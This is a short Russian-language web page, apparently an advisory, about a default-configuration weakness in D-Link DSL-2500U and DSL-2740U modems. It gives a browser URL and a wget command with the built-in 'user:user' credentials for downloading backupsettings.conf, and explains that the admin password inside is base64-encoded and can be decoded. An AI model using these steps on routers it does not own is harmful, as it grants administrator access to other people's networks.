Уязвимость стандартной конфигурации DSL модемов D-link DSL-2500U и D-link DSL-2740U

Информация на этой странице предоставлена для ознакомления. Использование данной информации в корыстных целях может привести к уголовной ответственности.

Назад    Вниз

Уязвимость заключается в возможности прочитать файл конфигурации backupsettings.conf используя встроенную учётную запись user.

1 способ

  • Зайдите под встроенной учётной записью user
  • Вставте ссылку в адресную строку браузера
  • http://192.168.0.1/backupsettings.conf
  • Сохраните файл конфигурации backupsettings.conf

2 способ

  • Сохраните файл конфигурации backupsettings.conf используя консольную программу wget операционной системы Linux
  • wget http://user:user@192.168.0.1/backupsettings.conf
  • Сохраните файл конфигурации backupsettings.conf

Примечание: Пароль учетной записи admin в файле конфигурации backupsettings.conf закодирован в base64. Чтобы его расшифровать, можно воспользоваться программой Notepad++ и плагином MIME Tools (Base64 Decode).


Назад    Вверх